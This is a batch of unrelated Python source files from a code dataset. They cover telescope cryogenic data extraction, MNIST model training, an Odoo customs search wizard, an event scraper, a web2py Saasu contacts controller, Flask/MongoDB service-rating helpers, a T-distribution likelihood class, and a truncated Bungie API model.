t.t4k_squid_strap = f['array']['cryo']['temperature'][0][14]\n t.t50k_head = f['array']['cryo']['temperature'][0][15]\n\n # Optics\n t.b1_50k_wbp_near = f['array']['cryo']['temperature'][1][0]\n t.b2_50k_wbp_far = f['array']['cryo']['temperature'][1][1]\n t.b3_50k_diving_board = f['array']['cryo']['temperature'][1][2]\n t.b4_50k_top_bot_ptc = f['array']['cryo']['temperature'][1][3]\n t.y1_50k_head = f['array']['cryo']['temperature'][1][4]\n t.y2_50k_window_strap_near = f['array']['cryo']['temperature'][1][5]\n t.y3_50k_tube_strap_near = f['array']['cryo']['temperature'][1][6]\n t.y4_50k_tube = f['array']['cryo']['temperature'][1][7]\n t.g1_4k_head = f['array']['cryo']['temperature'][1][8]\n t.g2_4k_strap = f['array']['cryo']['temperature'][1][9]\n t.g3_4k_lens_tab = f['array']['cryo']['temperature'][1][10]\n t.g4_4k_lens_tab_far = f['array']['cryo']['temperature'][1][11]\n t.r1_4k_top_top_ptc = f['array']['cryo']['temperature'][1][12]\n t.r2_50k_midop_bot_ptc = f['array']['cryo']['temperature'][1][13]\n t.r3_4k_lyot_flange = f['array']['cryo']['temperature'][1][14]\n t.r4_4k_lyot = f['array']['cryo']['temperature'][1][15]\n\n # Receiver\n t.t4k_plate_far = f['array']['cryo']['temperature'][2][0]\n t.t4k_strap_optics = f['array']['cryo']['temperature'][2][1]\n t.t4k_plate_mid = f['array']['cryo']['temperature'][2][2]\n t.t4k_plate_top = f['array']['cryo']['temperature'][2][3]\n t.t4k_plate_ptc = f['array']['cryo']['temperature'][2][4]\n t.t50k_harness_middle = f['array']['cryo']['temperature'][2][6]\n t.t50k_strap = f['array']['cryo']['temperature'][2][7]\n t.squid_wh1_sl1 = f['array']['cryo']['temperature'][2][8]\n t.squid_wh5_sl1 = f['array']['cryo']['temperature'][2][9]\n t.squid_wh3_sl7 = f['array']['cryo']['temperature'][2][10]\n t.cal_filament = f['array']['cryo']['temperature'][2][11]\n t.cal_ambient1 = f['array']['cryo']['temperature'][2][12]\n t.cal_ambient2 = f['array']['cryo']['temperature'][2][13]\n t.cal_ambient3 = f['array']['cryo']['temperature'][2][14]\n\n # Heaters\n t.heat_he4_pump = f['array']['cryo']['heater_dac'][0][3]\n t.heat_ic_pump = f['array']['cryo']['heater_dac'][0][4]\n t.heat_uc_pump = f['array']['cryo']['heater_dac'][0][5]\n t.heat_he4_sw = f['array']['cryo']['heater_dac'][0][0]\n t.heat_ic_sw = f['array']['cryo']['heater_dac'][0][1]\n t.heat_uc_sw= f['array']['cryo']['heater_dac'][0][2]\n\n f['CryoStatus'] = t\n\n\n@core.indexmod\ndef UnpackPTData(f):\n '''Extracts pulse tube status information to PTStatus key \n in frame'''\n\n if f.type != core.G3FrameType.GcpSlow:\n return\n\n if 'pt415' not in f['array']:\n return\n\n p = core.G3MapDouble()\n\n p.time = f['array']['pt415']['utc']\n p.optics_lowp = f['array']['pt415']['pressure_low'][0]\n p.min_optics_lowp = f['array']['pt415']['min_pressure_low'][0]\n p.max_optics_lowp = f['array']['pt415']['max_pressure_low'][0]\n p.optics_highp = f['array']['pt415']['pressure_high'][0]\n p.min_optics_highp = f['array']['pt415']['min_pressure_high'][0]\n p.max_optics_highp = f['array']['pt415']['max_pressure_high'][0]\n p.optics_tempoil = f['array']['pt415']['temp_oil'][0]\n p.min_optics_tempoil = f['array']['pt415']['min_temp_oil'][0]\n p.max_optics_tempoil = f['array']['pt415']['max_temp_oil'][0]\n\n p.receiver_lowp = f['array']['pt415']['pressure_low'][1]\n p.min_receiver_lowp = f['array']['pt415']['min_pressure_low'][1]\n p.max_receiver_lowp = f['array']['pt415']['max_pressure_low'][1]\n p.receiver_highp = f['array']['pt415']['pressure_high'][1]\n p.min_receiver_highp = f['array']['pt415']['min_pressure_high'][1]\n p.max_receiver_highp = f['array']['pt415']['max_pressure_high'][1]\n p.receiver_tempoil = f['array']['pt415']['temp_oil'][1]\n p.min_receiver_tempoil = f['array']['pt415']['min_temp_oil'][1]\n p.max_receiver_tempoil = f['array']['pt415']['max_temp_oil'][1]\n\n p.optics_is_valid = f['array']['pt415']['deviceIsValid'][0]\n p.receiver_is_valid = f['array']['pt415']['deviceIsValid'][1]\n\n\n f['PTStatus'] = p\n\n@core.indexmod\ndef UnpackMuxData(f):\n '''\n Add the DFMux data to the frame.\n '''\n if f.type != core.G3FrameType.GcpSlow:\n return\n\n try:\n mux = f['array']['muxHousekeeping']\n boards = mux['boardname']\n except KeyError:\n return\n\n fpga_temp = core.G3MapDouble()\n board_name = core.G3MapString()\n\n for i, bn in enumerate(boards):\n bn = str(bn).replace('\"', '') # get rid of extra quotes in board name\n if bn != \"\":\n board_name[str(i)] = bn\n fpga_temp[str(i)] = mux['MB_TEMPERATURE_FPGA_DIE'][i]\n fpga_temp.time = mux['utc']\n board_name.time = mux['utc']\n f['MuxFPGATemp'] = fpga_temp\n f['MuxBoardName'] = board_name\n\n@core.indexmod\ndef UnpackWeatherData(f):\n '''Extracts weather status information to Weather key \n in frame'''\n\n if f.type != core.G3FrameType.GcpSlow:\n return\n\n if 'weather' not in f['array']:\n return\n\n t = core.G3MapDouble()\n t.time = f['array']['weather']['utc']\n t.telescope_temp = f['array']['weather']['airTemperature'].value\n t.telescope_pressure = f['array']['weather']['pressure'].value\n t.inside_dsl_temp = f['array']['weather']['internalTemperature'].value\n t.wind_speed = f['array']['weather']['windSpeed'].value\n t.wind_direction = f['array']['weather']['windDirection'].value\n t.battery = f['array']['weather']['battery'].value\n t.rel_humidity = f['array']['weather']['relativeHumidity'].value\n t.power = f['array']['weather']['power'].value\n t.tau = f['array']['tipper']['tau'].value\n t.tatm = f['array']['tipper']['tatm'].value\n\n f['Weather'] = t\n\n@core.pipesegment\ndef ARCExtract(pipe):\n '''Extract GCP registers into native objects'''\n pipe.Add(CalibrateFrame)\n pipe.Add(UnpackACUData)\n pipe.Add(UnpackTrackerPointingData)\n pipe.Add(DecryptFeatureBit)\n pipe.Add(UnpackTrackerData)\n pipe.Add(AddBenchData)\n pipe.Add(UnpackCryoData)\n pipe.Add(UnpackPTData)\n pipe.Add(UnpackMuxData)\n pipe.Add(UnpackWeatherData)\n\n@core.pipesegment\ndef ARCExtractMinimal(pipe):\n '''\n Extract bare minimum GCP registers into native objects.\n\n Includes only GCPFeatureBits, SourceName and ObservationID keys.\n Use ARCExtract to calibrate and extract the complete frame.\n '''\n pipe.Add(DecryptFeatureBit)\n pipe.Add(UnpackTrackerMinimal)\n\n# Need tool for tilt meter next\n","sub_path":"gcp/python/ARCExtractor.py","file_name":"ARCExtractor.py","file_ext":"py","file_size_in_byte":27148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"627667994","text":"import numpy as np\nfrom matplotlib import pyplot as plt\n\nimport keras\nimport keras.backend as K\nfrom keras import models\nfrom keras import layers\nfrom keras.models import load_model\nfrom keras.datasets import mnist\nfrom keras.utils import to_categorical\nfrom keras.callbacks import ModelCheckpoint\n\nimport tensorflow as tf\n\nfrom ista import ISTA\n\n###\n#$$ nonconvex loss function\n###\ndef not_convex(y_true, y_pred):\n return K.sum(K.square(y_true - y_pred)) / ( K.sum(K.square(y_true)) + K.sum(K.square(y_pred)) )\n\n###\n### start a session - will need same session to link K to tf\n###\n\nsession = tf.Session()\nK.set_session(session)\n\n###\n### generate dummy model\n###\n\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\n\ntrain = x_train.reshape((60000,28*28)).astype('float32') / 255\ntest = x_test.reshape((10000,28*28)).astype('float32') / 255\n\ntrain_labels = to_categorical(y_train)\ntest_labels = to_categorical(y_test)\n\nmu = 0.0001\nconstraints = [keras.regularizers.l1(mu), ISTA(mu)]\nlocations = ['l1', 'ista']\n\nfor con, loc in zip(constraints, locations):\n\n net = models.Sequential()\n net.add(layers.Dense(256, activation='relu', input_shape=(28*28,)))\n net.add(layers.Dense(128, activation='relu'))\n if loc == 'l1':\n net.add(layers.Dense(128, activation='relu', kernel_regularizer=con))\n elif loc == 'ista':\n net.add(layers.Dense(128, activation='relu', kernel_constraint=con))\n else:\n net.add(layers.Dense(128, activation='relu'))\n net.add(layers.Dense(10, activation='softmax'))\n net.compile(optimizer='adam',loss=not_convex,metrics=['accuracy'])\n # net.compile(optimizer='adam',loss='categorical_crossentropy',metrics=['accuracy'])\n\n h = net.fit(train,\n train_labels,\n epochs=40,\n batch_size=128,\n shuffle=True)\n\n net.save('mnistmodel-'+loc+'.h5')\n","sub_path":"analysis/mnist/buildmnistmodels.py","file_name":"buildmnistmodels.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"589132886","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api\nfrom odoo import exceptions\n\n\nclass IacAsnCustomsSasSearchLine(models.Model):\n _inherit = 'iac.customs.sas.line'\n _name = 'iac.asn.customs.sas.search.line'\n _table = 'iac_customs_sas_line'\n\n # sas_stock_line_ids = fields.One2many('iac.customs.sas.line.inherit', 'sas_stock_id', string=u'出入库单line ID', index=True)\n\n\nclass IacAsnCustomsSasSearchData(models.Model):\n _inherit = 'iac.customs.sas.header'\n _name = 'iac.asn.customs.sas.search.data'\n _table = 'iac_customs_sas_header'\n\n sas_stock_line_ids = fields.One2many('iac.asn.customs.sas.search.line', 'sas_stock_id', string=u'出入库单line ID', index=True)\n\n\nclass IacAsnCustomsSasReport(models.TransientModel):\n\n _name = 'iac.asn.customs.sas.report.wizard'\n # _auto = False\n\n plant_id = fields.Many2one('pur.org.data',string='Plant *')\n vendor_code = fields.Many2one('iac.vendor',string='Vendor Code')\n sas_dcl_no = fields.Char(string=u'业务申报表编号')\n # part_no = fields.Char(string=u'料号')\n sas_stock_no = fields.Char(string=u'出入库单编号')\n sas_stock_preent_no = fields.Char(string=u'预录入编号')\n stock_typecd = fields.Selection([(\"I\", u\"进区\"), (\"E\", u\"出区\")], string=u\"出入库单类型\")\n state = fields.Selection([(\"wait_mm_approve\", u\"待采购确认\"),\n (\"wait_lg_approve\", u\"待关务确认\"),\n (\"mm_reject\", u\"采购拒绝\"),\n ('lg_approved', u'关务核准'),\n (\"lg_reject\", u\"关务拒绝\"),\n (\"interface_submit_success\", u\"推送海关系统成功\"),\n (\"interface_submit_fail\", u\"推送海关系统失败\"),\n ('cancel', u'厂商取消'),\n (\"to_cancel\", u\"作废中\"),\n (\"done\", \"done\")], string=u\"状态\")\n from_date = fields.Date(string='From Date *')\n to_date = fields.Date(string='To Date *')\n\n @api.multi\n def search_customs_sas_data(self):\n self.ensure_one()\n # result = []\n domain = []\n for wizard in self:\n if wizard.plant_id:\n domain += [('plant_id', '=', wizard.plant_id.id)]\n if wizard.vendor_code:\n domain += [('vendor_id', '=', wizard.vendor_code.id)]\n if wizard.sas_dcl_no:\n domain += [('sas_dcl_no', '=', wizard.sas_dcl_no)]\n if wizard.sas_stock_no:\n domain += [('sas_stock_no', '=', wizard.sas_stock_no)]\n if wizard.sas_stock_preent_no:\n domain += [('sas_stock_preent_no', '=', wizard.sas_stock_preent_no)]\n if wizard.stock_typecd:\n domain += [('stock_typecd', '=', wizard.stock_typecd)]\n if wizard.state:\n domain += [('state', '=', wizard.state)]\n if wizard.from_date and not wizard.to_date:\n domain += [('create_date', '>=', wizard.from_date)]\n if wizard.to_date and not wizard.from_date:\n domain += [('create_date', '<=', wizard.to_date)]\n\n if wizard.from_date and wizard.to_date:\n if wizard.from_date > wizard.to_date:\n raise exceptions.ValidationError(u'查询日期条件不正确!')\n else:\n domain += [('create_date', '>=', wizard.from_date), ('create_date', '<=', wizard.to_date)]\n\n for item in self.env.user.groups_id:\n if item.name == 'External vendor' and not wizard.vendor_code:\n raise exceptions.ValidationError(u'厂商必须选择vendor code')\n\n result = self.env['iac.asn.customs.sas.search.data'].search(domain)\n if not result:\n raise exceptions.ValidationError(u'查无资料!')\n\n action = {\n 'domain': [('id', 'in', [x.id for x in result])],\n 'name': 'customs sas',\n 'type': 'ir.actions.act_window',\n 'view_mode': 'tree,form',\n 'res_model': 'iac.asn.customs.sas.search.data'\n\n }\n return action\n","sub_path":"addons/mk_addons/myaddons/iac_report/models/iac_asn_customs_sas_report.py","file_name":"iac_asn_customs_sas_report.py","file_ext":"py","file_size_in_byte":4228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"219701737","text":"from datetime import datetime\nfrom bs4 import BeautifulSoup\nimport locale, requests\n\ndef GelredomeLoader():\n try: #Rick\n locale.setlocale(locale.LC_ALL,'nl_NL.UTF-8')#Dutch\n except: #Sander\n locale.setlocale(locale.LC_ALL,'Dutch_Netherlands.1252')#Dutch\n\n URL = 'http://www.gelredome.nl/nl/evenementen'\n container = []\n \n # #Scrape the main site for links to events\n for link in BeautifulSoup(requests.get(URL).content,\"html.parser\").findAll('div',attrs={'class':'agenda-items__content '}): \n title = link.find('h3').text\n if 'Vitesse' not in title:\n url = 'http://www.gelredome.nl' + link.find('a')['href']\n \n day = link.find('div',attrs={'class':'agenda-items__day'}).text.strip()\n month = link.find('div',attrs={'class':'agenda-items__month'}).text.strip()\n date = datetime.strptime(day + ' ' + month,'%d %B %Y').date()\n time = None\n\n container.append([title,\n date,\n time,\n url])\n \n try: #Rick\n locale.setlocale(locale.LC_ALL,'en_US.UTF-8')#English US\n except: #Sander\n locale.setlocale(locale.LC_ALL,'English_United States.1252')#English US\n return container","sub_path":"Venues/Gelredome.py","file_name":"Gelredome.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"298829666","text":"# -*- coding: utf-8 -*-\n# this file is released under public domain and you can use without limitations\n\n#########################################################################\n## This is a sample controller\n## - index is the default action of any application\n## - user is required for authentication and authorization\n## - download is for downloading files uploaded in the db (does streaming)\n## - call exposes all registered services (none by default)\n#########################################################################\nimport saasu_api_helpers\nfrom gluon.tools import geocode\nfrom simplejson import loads,dumps\nfrom datetime import date, datetime,timedelta\n\ndef index():\n \"\"\"\n example action using the internationalization operator T and flash\n rendered by views/default/index.html or views/generic.html\n\n if you need a simple wiki simply replace the two lines below with:\n return auth.wiki()\n \"\"\"\n response.flash = T(\"Welcome to web2py!\")\n return dict(message=T('Hello World'))\n\n\ndef user():\n \"\"\"\n exposes:\n http://..../[app]/default/user/login\n http://..../[app]/default/user/logout\n http://..../[app]/default/user/register\n http://..../[app]/default/user/profile\n http://..../[app]/default/user/retrieve_password\n http://..../[app]/default/user/change_password\n http://..../[app]/default/user/manage_users (requires membership in\n use @auth.requires_login()\n @auth.requires_membership('group name')\n @auth.requires_permission('read','table name',record_id)\n to decorate functions that need access control\n \"\"\"\n return dict(form=auth())\n\n@cache.action()\ndef download():\n \"\"\"\n allows downloading of uploaded files\n http://..../[app]/default/download/[filename]\n \"\"\"\n return response.download(request, db)\n\n\ndef call():\n \"\"\"\n exposes services. for example:\n http://..../[app]/default/call/jsonrpc\n decorate with @services.jsonrpc the functions to expose\n supports xml, json, xmlrpc, jsonrpc, amfrpc, rss, csv\n \"\"\"\n return service()\n\n\n@auth.requires_signature()\ndef data():\n \"\"\"\n http://..../[app]/default/data/tables\n http://..../[app]/default/data/create/[table]\n http://..../[app]/default/data/read/[table]/[id]\n http://..../[app]/default/data/update/[table]/[id]\n http://..../[app]/default/data/delete/[table]/[id]\n http://..../[app]/default/data/select/[table]\n http://..../[app]/default/data/search/[table]\n but URLs must be signed, i.e. linked with\n A('table',_href=URL('data/tables',user_signature=True))\n or with the signed load operator\n LOAD('default','data.load',args='tables',ajax=True,user_signature=True)\n \"\"\"\n return dict(form=crud())\n\n@auth.requires_login() #should actually be admin user\ndef edit_file_config():\n \"\"\" edit the saasu file config\n \"\"\"\n grid=SQLFORM.grid(db.saasu_file_data)\n return {'grid':grid}\n\n# @auth.requires_login()\n# def choose_saasu_file():\n# \"\"\" find all saasu files the user can see\n# \"\"\"\n# file_qry = (db.auth_membership.user_id == auth.user_id ) & (db.saasu_file_data.saasu_group == db.auth_membership.group_id)\n# file_set = db(file_qry)\n# rows = file_set.select(db.saasu_file_data.id,db.saasu_file_data.saasu_filename,db.saasu_file_data.saasu_fileUID)\n# if rows:\n# if not session.saasu_fileUID:\n# session.saasu_fileUID = rows[0].saasu_fileUID\n# form = SQLFORM.factory(Field('choose_file',\n# default=session.saasu_fileUID,\n# requires=IS_IN_DB(file_set,'saasu_file_data.saasu_fileUID','%(saasu_filename)s')))\n# form.vars.choose_file=session.saasy_fileUID\n#\n# if form.process(keepvalues=True).accepted:\n# response.flash = 'Saasu file is now: %s' % form.vars.choose_file\n# session.saasu_fileUID = form.vars.choose_file\n# redirect( request.env.http_web2py_component_location,client_side=True)\n# elif form.errors:\n# response.flash = 'form has errors'\n#\n# return {'form':form}\n\n\n@auth.requires_login()\ndef choose_saasu_file_v2():\n \"\"\" find all saasu files the user can see\n \"\"\"\n file_qry = (db.auth_membership.user_id == auth.user_id ) & (db.saasu_file_data.saasu_group == db.auth_membership.group_id)\n file_set = db(file_qry)\n rows = file_set.select(db.saasu_file_data.id,db.saasu_file_data.saasu_filename,db.saasu_file_data.saasu_fileUID)\n if rows:\n if not session.saasu_fileUID:\n session.saasu_fileUID = rows[0].saasu_fileUID\n form = SQLFORM.factory(Field('choose_file',\n\n default=session.saasu_fileUID,\n requires=IS_IN_DB(file_set,'saasu_file_data.saasu_fileUID','%(saasu_filename)s')))\n\n form.vars.choose_file = session.saasu_fileUID\n if form.process(keepvalues=True).accepted:\n saasu_file_name = db(db.saasu_file_data.saasu_fileUID==form.vars.choose_file).select(db.saasu_file_data.saasu_filename).first().saasu_filename\n response.flash = 'Saasu file is now: %s' % saasu_file_name\n session.saasu_fileUID = form.vars.choose_file\n if request.vars.target_div:\n response.js = \"jQuery('#%s').get(0).reload()\" % request.vars.target_div\n #response.js = \"jQuery('#google_map_comp').reload()\"\n elif form.errors:\n response.flash = 'form has errors'\n return {'form':form}\n\n@auth.requires_login()\ndef google_map():\n locations = []\n rows = db((db.saasu_contact.is_customer == True) & (db.saasu_contact.is_active == True) & (db.saasu_contact.saasu_fileUID == session.saasu_fileUID)).select()\n for customer in rows:\n locations.append((getattr(customer,\"latitude\",0),getattr(customer,\"longitude\",0),customer.company))\n\n locations_json = dumps(locations)\n return locals()\n\n\n\n@auth.requires_login()\ndef contacts_grid():\n def update_contact_table(ws_access_key=None,file_uid=None,last_sync_date = None): #this is controlled via cache\n contacts = saasu_api_helpers.get_contacts(ws_access_key=ws_access_key,file_uid=file_uid,last_sync_date=last_sync_date)\n i = 0\n for contact in contacts:\n\n if not contact['country']:\n contact['country'] = 'Australia'\n (latitude,longitude) = geocode(\"%(street)s %(city)s %(state)s %(country)s \" %\n { 'street': contact['street'] or '',\n 'city':contact['city'] or '',\n 'state':contact['state'] or '',\n 'country':contact['country'] or ''}\n )\n db.saasu_contact.update_or_insert(\n ((db.saasu_contact.saasu_fileUID == file_uid ) &\n (db.saasu_contact.saasu_contactUID == contact['contactUid'])),\n saasu_fileUID = file_uid,\n saasu_contactUID = contact['contactUid'],\n family_name = contact['familyName'],\n given_name = contact['givenName'],\n company = contact['organisationName'],\n email = contact['emailAddress'],\n main_phone = contact['mainPhone'],\n mobile_phone =contact['mobilePhone'] ,\n mailing_street = contact['street'] ,\n mailing_town = contact['city'],\n mailing_zip = contact['postCode'],\n mailing_state = contact['state'],\n is_active = contact['isActive'],\n is_customer = contact['isCustomer'],\n is_supplier = contact['isSupplier'],\n mailing_country = contact['country'],\n latitude = latitude,\n longitude = longitude\n )\n #update the last sync date. It's supposed to be a UTC time stamp so I'll just take 2 days off the current date\n\n # db(db.saasu_file_data.saasu_fileUID == session.saasu_fileUID).update(\n # last_contact_sync=((datetime.now() - timedelta(days=2)).date()))\n two_days_ago = (datetime.now() - timedelta(days=1))\n db(db.saasu_file_data.saasu_fileUID == session.saasu_fileUID).update(\n last_contact_sync=two_days_ago)\n\n grid = None\n if session.saasu_fileUID:\n saasu_file_record = db(db.saasu_file_data.saasu_fileUID == session.saasu_fileUID).select().first()\n last_sync_date = saasu_file_record.last_contact_sync\n if saasu_file_record:\n saasu_api_key = saasu_file_record.saasu_api_key\n contact_list = cache.disk('contacts-%s' % saasu_api_key,\n lambda: update_contact_table(ws_access_key=saasu_file_record.saasu_api_key,\n file_uid=saasu_file_record.saasu_fileUID,\n last_sync_date=last_sync_date),\n time_expire=500)\n grid = SQLFORM.grid(db.saasu_contact.saasu_fileUID == session.saasu_fileUID,\n fields=[db.saasu_contact.company,db.saasu_contact.given_name,db.saasu_contact.family_name,db.saasu_contact.mailing_town,db.saasu_contact.mailing_zip,db.saasu_contact.mailing_state],\n deletable=False,editable=False,create=False,paginate=100,maxtextlength=40,\n )\n\n return {'grid':grid}\n\n@auth.requires_login()\ndef map_contacts():\n locations = []\n rows = db((db.saasu_contact.is_customer == True) & (db.saasu_contact.is_active == True) & (db.saasu_contact.saasu_fileUID == session.saasu_fileUID)).select()\n for customer in rows:\n locations.append((getattr(customer,\"latitude\",0),getattr(customer,\"longitude\",0),customer.company))\n\n locations_json = dumps(locations)\n\n\n return locals()\n\n\n@auth.requires_login()\ndef map_contacts_v2():\n return locals()\n\n\n@auth.requires_login()\ndef browse_contacts():\n return locals()","sub_path":"controllers/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":10075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"585520879","text":"from flaskweb import db\nimport datetime\n\n# Method to calculate the mean rating,\n# accept a list of services and return a list\ndef meanRating(services):\n for j in services:\n length = len(j['Rating'])\n if length == 0:\n j['meanRating'] = 0\n else:\n sum1 = sum(j['Rating'])\n meanRating = sum1 / length\n meanRating = round(meanRating, 1)\n j['meanRating'] = meanRating\n services = sorted(services, key=lambda k: -(k.get('meanRating')))\n return services\n\n# Method to get the services from the db based on types\n# Accept the service type, return a list of services\ndef getServices(name):\n cursor = db.Services.find({'Type':name})\n services = []\n for i in cursor:\n # Use the services that contain description and coordinate\n if i['Type'] != 'hotlines':\n if i['What'] != 'Unknown' and i['Latitude'] != 'Unknown' and i['Longitude'] != 'Unknown':\n services.append(i)\n else:\n if i['What'] != 'Unknown':\n services.append(i)\n services = meanRating(services)\n return services\n\n# Method to set the pagination\n# Accept a list of data\ndef getServicesPage(data, offset=0, per_page=10):\n return data[offset: offset + per_page]\n\n# Method to return a specific service with detailed information\n# Accept the type and the id_\ndef getInfo(name, id_):\n data = getServices(name)\n for i in data:\n if str(i.get('id_')) == id_:\n return i\n\n# Method to update the rating, each user can only give one rating to one service\n# Accept the service type and id_, the rating(str) and user email\ndef updateRating(name, id_, rating, email):\n alist = db.Services.find_one({'Type': name, 'id_': int(id_)}).get('Rating')\n ratingDic = db.user.find_one({'email': email}).get('rating')\n key = name + id_\n\n # check whether the user has given a rating the this service,\n # If no, add the new rating. Else replace the previous rating\n if key not in ratingDic.keys():\n ratingDic[key] = int(rating)\n alist.append(int(rating))\n else:\n oldrating = int(ratingDic[key])\n ratingDic[key] = int(rating)\n alist.remove(oldrating)\n alist.append(int(rating))\n\n # Update both user and services db\n db.Services.update_one(\n {'Type': name, 'id_': int(id_)},\n {'$set': {\n 'Rating': alist\n }}\n )\n db.user.update_one(\n {'email': email},\n {'$set': {\n 'rating': ratingDic\n }}\n )\n return 'success'\n\n# Method to add the user's favorite\n# Accept user's email, the favorited service's type and id_\n# Users' favorite store the type and the id_\ndef updateFavorite(email, service_name, service_id):\n alist = db.user.find_one({'email': email}).get('favorite')\n service = {'Type': service_name, 'id_': service_id}\n if service not in alist:\n alist.insert(0, service)\n db.user.update_one(\n {'email': email},\n {'$set': {\n 'favorite': alist\n }}\n )\n return 'success'\n else:\n return 'fail'\n\n# Method to remove the user's favorite\n# Accept user's email, the favorited service's type and id_\ndef remFavorite(email, service_name, service_id):\n alist = db.user.find_one({'email': email}).get('favorite')\n service = {'Type': service_name, 'id_': service_id}\n if service in alist:\n alist.remove(service)\n db.user.update_one(\n {'email': email},\n {'$set': {\n 'favorite': alist\n }}\n )\n return 'success'\n else:\n return 'fail'\n\n# Method to get the detailed favorited service\n# Accept user's email and return a list of services\ndef getFavorite(email):\n alist = db.user.find_one({'email': email}).get('favorite')\n favoData = []\n for i in alist:\n favoData.append(getInfo(i['Type'], i['id_']))\n return favoData\n\n# Method to return the today's day\ndef pass_today():\n dic = {'0':'Monday', '1':'Tuesday', '2':'Wednesday', '3':'Thursday',\n '4':'Friday', '5':'Saturday', '6':'Sunday'}\n day = datetime.datetime.today().weekday()\n return dic[str(day)]\n\n# Method to determine if there is a map in search display page\n# Accept a list of services, return yes or no\ndef ifMap(data):\n map = 'yes'\n if len(data) == 1 and data[0]['Type'] == 'hotlines':\n map = 'no'\n else:\n typeList = []\n for i in data:\n typeList.append(i['Type'])\n if len(set(typeList)) == 1 and typeList[0] == 'hotlines':\n map = 'no'\n else:\n for i in data:\n if i['Type'] != 'hotlines':\n temp = i\n data.remove(i)\n data.insert(0,temp)\n break\n return map\n","sub_path":"IEweb_Backup/flaskweb/getData.py","file_name":"getData.py","file_ext":"py","file_size_in_byte":4847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"212620964","text":"import numpy as np\nimport pandas as pd\nimport scipy.linalg\n\nfrom ..core import LogLike\n\n\nclass TdistLogLike(LogLike):\n \"\"\"A T-distribution for the log-likelihood.\n\n This distribution is appropriate when the covariance has been obtained\n from a finite number of simulations. See Sellentin & Heavens\n (2016; arXiv:1511.05969). As the number of simulations increases, the\n T-distribution approaches a Gaussian.\n\n Parameters\n ----------\n data : str\n The path to the covariance matrix in CSV format. The columns should be\n {'i', 'j', 'cov'} giving the indices of each matrix element and its\n value.\n data_vector : list of str\n A list of the statistics in the config file in the order they appear in\n the covariance matrix.\n nu: int\n The shape parameter. Set to the number of simulations.\n\n Attributes\n ----------\n cov : np.ndarray, shape (n, n)\n The covariance matrix.\n cholesky : np.ndarray, shape (n, n)\n The (lower triangular) Cholesky decomposition of the covariance matrix.\n\n Methods\n -------\n compute_loglike : compute the log-likelihood\n \"\"\"\n def __init__(self, data, data_vector, nu):\n self.data = data\n self.data_vector = data_vector\n self.nu = nu\n\n df = pd.read_csv(data)\n dim = max(np.max(df['i']), np.max(df['j'])) + 1\n cov = np.zeros((dim, dim))\n cov[df['i'].values, df['j'].values] = df['cov'].values\n self.cov = cov\n self.cholesky = scipy.linalg.cholesky(cov, lower=True)\n\n def compute(self, data, theory, **kwargs):\n \"\"\"Compute the log-likelihood.\n\n Parameters\n ----------\n data : dict of arrays\n A dictionary mapping the names of the statistics to their\n values in the data.\n theory : dict of arrays\n A dictionary mapping the names of the statistics to their\n predictions.\n **kwargs : extra keyword arguments\n Any extra keyword arguments are ignored.\n\n Returns\n -------\n loglike : float\n The log-likelihood.\n \"\"\"\n dv = []\n for stat in self.data_vector:\n dv.append(np.atleast_1d(data[stat] - np.atleast_1d(theory[stat])))\n dv = np.concatenate(dv, axis=0)\n x = scipy.linalg.solve_triangular(self.cholesky, dv, lower=True)\n chi2 = np.dot(x, x)\n return -0.5 * self.nu * np.log(1.0 + chi2 / (self.nu - 1.0))\n","sub_path":"firecrown/ccl/likelihoods/tdist.py","file_name":"tdist.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"8224553","text":"# coding: utf-8\n\n\"\"\"\n Bungie.Net API\n\n These endpoints constitute the functionality exposed by Bungie.net, both for more traditional website functionality and for connectivity to Bungie video games and their related functionality. # noqa: E501\n\n OpenAPI spec version: 2.1.1\n Contact: support@bungie.com\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom swagger_client.models.destiny_definitions_items_destiny_derived_item_category_definition import DestinyDefinitionsItemsDestinyDerivedItemCategoryDefinition # noqa: F401,E501\n\n\nclass DestinyDefinitionsDestinyItemPreviewBlockDefinition(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'preview_vendor_hash': 'int',\n 'preview_action_string': 'str',\n 'derived_item_categories': 'list[DestinyDefinitionsItemsDestinyDerivedItemCategoryDefinition]'\n }\n\n attribute_map = {\n 'preview_vendor_hash': 'previewVendorHash',\n 'preview_action_string': 'previewActionString',\n 'derived_item_categories': 'derivedItemCategories'\n }\n\n def __init__(self, preview_vendor_hash=None, preview_action_string=None, derived_item_categories=None): # noqa: E501\n \"\"\"DestinyDefinitionsDestinyItemPreviewBlockDefinition - a model defined in Swagger\"\"\" # noqa: E501\n\n self._preview_vendor_hash = None\n self._preview_action_string = None\n self._derived_item_categories = None\n self.discriminator = None\n\n if preview_vendor_hash is not None:\n self.preview_vendor_hash = preview_vendor_hash\n if preview_action_string is not None:\n self.preview_action_string = preview_action_string\n if derived_item_categories is not None:\n self.derived_item_categories = derived_item_categories\n\n @property\n def preview_vendor_hash(self):\n \"\"\"Gets the preview_vendor_hash of this DestinyDefinitionsDestinyItemPreviewBlockDefinition. # noqa: E501\n\n If the preview data is derived from a fake \\\"Preview\\\" Vendor, this will be the hash identifier for the DestinyVendorDefinition of that fake vendor. # noqa: E501\n\n :return: The preview_vendor_hash of this DestinyDefinitionsDestinyItemPreviewBlockDefinition. # noqa: E501\n :rtype: int\n 